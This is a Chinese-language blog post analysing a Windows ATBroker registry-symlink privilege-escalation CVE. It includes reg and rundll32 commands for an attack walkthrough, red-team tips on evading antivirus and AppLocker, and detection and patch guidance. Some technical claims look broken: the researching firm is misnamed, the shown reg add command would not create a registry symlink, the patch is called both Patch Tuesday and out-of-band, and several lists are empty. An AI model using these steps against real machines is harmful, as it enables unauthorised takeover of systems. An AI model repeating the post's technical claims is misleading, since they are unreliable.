不乱于心,不困于情。
不畏将来,不念过往。如此,安好。

CVE-2026-24291:Windows ATConfig辅助功能本地提权漏洞深度解析

导语:一个普通用户,无需任何特殊权限,只需在锁屏界面上触发一次竞争条件,就能获得系统的最高控制权——这正是CVE-2026-24291(代号RegPwn)所实现的效果。2026年3月,这个潜伏在Windows辅助功能ATConfig机制中的高危漏洞被公开披露,影响从Windows 11 24H2到Windows Server 2025的多个主流版本。攻击者可以利用它悄无声息地将权限从”用户”提升到”SYSTEM”,从而完全掌控目标机器。


一、漏洞概述

CVE-2026-24291是一个高危本地权限提升漏洞,由英国安全公司MDSec(Mandiant Security Consulting)的研究员发现并报告给微软。该漏洞的核心在于Windows辅助功能基础设施(Accessibility Infrastructure)中的ATBroker.exe组件对注册表操作的错误处理。

漏洞被命名为”RegPwn“——这个名字精准地概括了它的本质:通过注册表(Registry)滥用实现权限劫持(Pwn)。与许多依赖复杂内存破坏的提权漏洞不同,RegPwn是一个逻辑层面的漏洞,利用Windows安全桌面切换过程中的时序竞争条件,通过注册表符号链接(Registry Symbolic Link)将低权限的注册表写操作重定向到高权限的系统注册表项。

这个漏洞的CVSS评分为9.1(高危),攻击复杂度低,且无需任何用户交互(除了触发锁屏这一系统固有行为)。在2026年3月微软补丁星期二(Patch Tuesday)发布修复前,全球数以亿计的Windows设备都暴露在此风险之下。

图1–CVE-2026-24291:Windows ATConfig辅助功能本地提权漏洞深度解析–seo优化_前端开发_渗透技术


二、技术原理

2.1 受影响组件:ATBroker.exe与ATConfig机制

ATBroker.exe(Assistive Technology Broker)是Windows辅助功能代理服务,负责管理屏幕阅读器、屏幕键盘、放大镜等辅助工具。它运行在SYSTEM权限下,并与用户会话通过注册表进行通信。

ATConfig机制是ATBroker用于保存和加载辅助功能配置的注册表结构,主要路径包括:

关键问题在于:当用户锁定工作站(Win+L)或触发UAC提权时,ATBroker会从用户注册表项读取配置,然后以SYSTEM权限写入到系统注册表项。这个从低权限到高权限的”信任传递”环节,正是攻击的突破口


2.2 漏洞本质:注册表符号链接竞争条件

漏洞根源在于Windows对注册表符号链接的创建和解析缺乏严格的权限验证。攻击流程如下:

阶段1:符号链接预创建

攻击者在自己的HKEY_CURRENT_USER下创建一个注册表符号链接,指向受保护的系统注册表项(例如HKLM\SYSTEM\CurrentControlSet\Services\下的某个服务项)。例如:

REG ADD HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig /ve /d "\??\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\msiserver" /f

阶段2:竞争窗口

当用户执行锁定工作站(Lock Workstation)操作时,系统会切换到安全桌面(Secure Desktop)。此时ATBroker.exe会读取ATConfig配置,并尝试将辅助功能设置同步到系统注册表项——正是这个同步过程,ATBroker会无差别地跟随符号链接,将数据写入攻击者指定的位置

阶段3:权限提升

攻击者通过符号链接将恶意数据写入到敏感的系统服务配置项(如ImagePath),从而控制随系统启动的高权限进程,最终实现从普通用户到SYSTEM的提权。


2.3 关键CWE漏洞类型

CWE编号 描述
CWE-362 并发执行不正确的同步(Race Condition)——攻击利用了锁屏切换的时间窗口
CWE-59 通过符号链接进行不正确的链接解析(Link Following)——注册表符号链接未验证目标
CWE-732 不正确的权限分配——HKCU与HKLM之间的信任边界不清晰

三、攻击演示

根据公开的PoC(概念验证)代码,攻击流程可以简化为以下步骤:

第一步:检查环境

# 确认当前为普通用户whoami# 输出:DESKTOP-XXXX\普通用户

第二步:创建符号链接(低权限操作)

# 利用reg.exe命令创建指向敏感注册表项的符号链接reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig" /ve /d "\??\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\msiserver" /f

第三步:触发竞争条件

# 锁定工作站,触发ATBroker在安全桌面的配置同步rundll32.exe user32.dll,LockWorkStation

第四步:验证提权

等待锁屏结束后解锁,执行:

whoami# 输出:NT AUTHORITY\SYSTEM

此时攻击者已拥有系统最高权限,可以:


四、实际影响

4.1 受影响版本

根据微软安全公告和公开研究,受CVE-2026-24291影响的Windows版本包括:

操作系统 受影响版本 修复状态
Windows 11
22H2, 23H2, 24H2
✓ 已修复(KB5077181)
Windows 10 21H2, Enterprise LTSC ✓ 已修复
Windows Server 2016, 2019, 2022, 2025 ✓ 已修复

Windows 11 24H2作为微软最新的桌面操作系统版本,在漏洞披露时正处于广泛部署阶段,因此受影响面极广。

4.2 利用门槛与攻击场景

条件 要求
初始权限 普通用户/访客账户(Medium Integrity Level)
物理/远程 本地登录(物理访问或RDP会话)
用户交互 无需用户确认,仅需锁屏触发(系统固有行为)
攻击复杂度 低(单行命令即可完成)

典型攻击场景

  1. 内网渗透后期
  2. 物理访问攻击
  3. 恶意软件利用

五、漏洞披露与利用代码

5.1 时间线

5.2 公开利用代码

目前已有多个公开的PoC/EXP实现:

  1. GitHub PoC(lennertdefauw/CVE-2026-24291)

  2. Brute Ratel C4 BOF模块

  3. Metasploit模块(社区贡献)


六、检测与取证

6.1 Windows事件日志监控

 defenders应重点关注以下事件ID:

事件ID 来源 描述
4657 Security
注册表值被修改——关注HKLM\SYSTEM\CurrentControlSet\Services下的修改
4688 Security 创建新进程——观察cmd.exe/powershell.exe的SYSTEM级父进程
4670 Security 对象权限被更改——注册表项的ACL变更
7036 Service Control Manager 服务状态变更——可疑服务被创建或启动
1001 Application Windows错误报告——ATBroker异常崩溃可能暗示攻击

6.2 Sysmon关键规则

    C:\Windows\System32\ATBroker.exe    \SYSTEM\CurrentControlSet\Services\

6.3 行为指标(IoCs)

指标类型 具体表现
进程行为 ATBroker.exe

 在锁屏后短时间内启动子进程(如reg.exepowershell.exe
注册表活动 HKCU…\ATConfig 路径下出现指向HKLM的符号链接(类型:REG_LINK)
网络行为 提权后短时间内出现异常出站连接(C2回连)
文件活动 msiserver

 服务的ImagePath被修改为非常规路径

七、缓解与修复

7.1 官方补丁

微软已在 2026年3月10日 发布带外安全更新修复此漏洞:

验证修复

# 查看已安装的补丁Get-HotFix | Where-Object {$_.HotFixID -match "KB5077181|KB5075897|KB5075899"}# 或使用wmicwmic qfe list brief /format:table | findstr "KB5077181"

7.2 临时缓解措施(无法立即打补丁)

  1. 限制ATBroker执行权限

  2. 注册表权限加固

    内容:

  3. 启用UAC始终通知

  4. 部署AppLocker或WDAC 创建规则禁止未签名的可执行文件从临时目录运行,阻止PoC脚本执行。

7.3 渗透测试视角的绕过思路

对于红队而言,目标环境中大概率已部署基础防护。以下是在受限环境中尝试利用该漏洞的几种思路:

限制条件 绕过策略
杀毒软件实时监控
将payload注入合法进程内存(如notepad.exe),避免落地文件
AppLocker白名单
使用已签名的系统二进制文件(如msbuild.exe)加载恶意配置
无法创建符号链接 利用Junction替代Symbolic Link(需SeCreateSymbolicLinkPrivilege)
无法锁定工作站 模拟安全桌面切换(SendMessage/SendInput触发锁屏API)

八、红队应用与防御建议

8.1 对攻击者的价值

CVE-2026-24291是一个完美的红队提权工具

  1. 稳定性高
  2. 隐蔽性强
  3. 兼容性好
  4. 免杀容易

在红队评估中,该漏洞常被用于横向移动后的快速权限提升阶段——当攻击者通过钓鱼获得一个普通用户RDP会话后,使用该漏洞在30秒内完成提权,从而为后续的域内活动扫清障碍。

8.2 对防御者的建议

  1. 优先补丁关键补丁
  2. 监控ATBroker异常ATBroker.exe
  3. 最小权限原则HKLM\SYSTEM\CurrentControlSet\Services\
  4. 定期权限审计Get-AclRegDACL
  5. 模拟攻击测试

九、总结

CVE-2026-24291(RegPwn)代表了现代Windows内核中一类危险的逻辑漏洞:辅助功能机制与注册表安全模型之间的信任错位。攻击者不需要复杂的利用链,也不需要绕过任何内存保护机制,仅通过精心构造的符号链接和一次锁屏触发,就能将普通用户权限直接提升至SYSTEM。

这个漏洞的披露再次提醒我们:提权漏洞的本质是权限边界的模糊。即使是最底层的系统组件(如ATBroker),在处理跨权限边界的操作时也必须遵循”绝不信任用户输入”的原则。

对于 defenders 而言,理解这类漏洞的原理有助于构建更有效的检测规则——监控ATBroker进程、注册表符号链接创建、以及HKLM服务的非预期修改,都是可以立即落手的检测点。

对于 red teamers 而言,CVE-2026-24291是一个值得加入武器库的高稳定性提权选项。但在实际使用中,务必注意目标环境是否已修补,并准备好应对EDR对ATBroker异常行为的告警。

赞(0)
未经允许不得转载:seo优化_前端开发_渗透技术 » CVE-2026-24291:Windows ATConfig辅助功能本地提权漏洞深度解析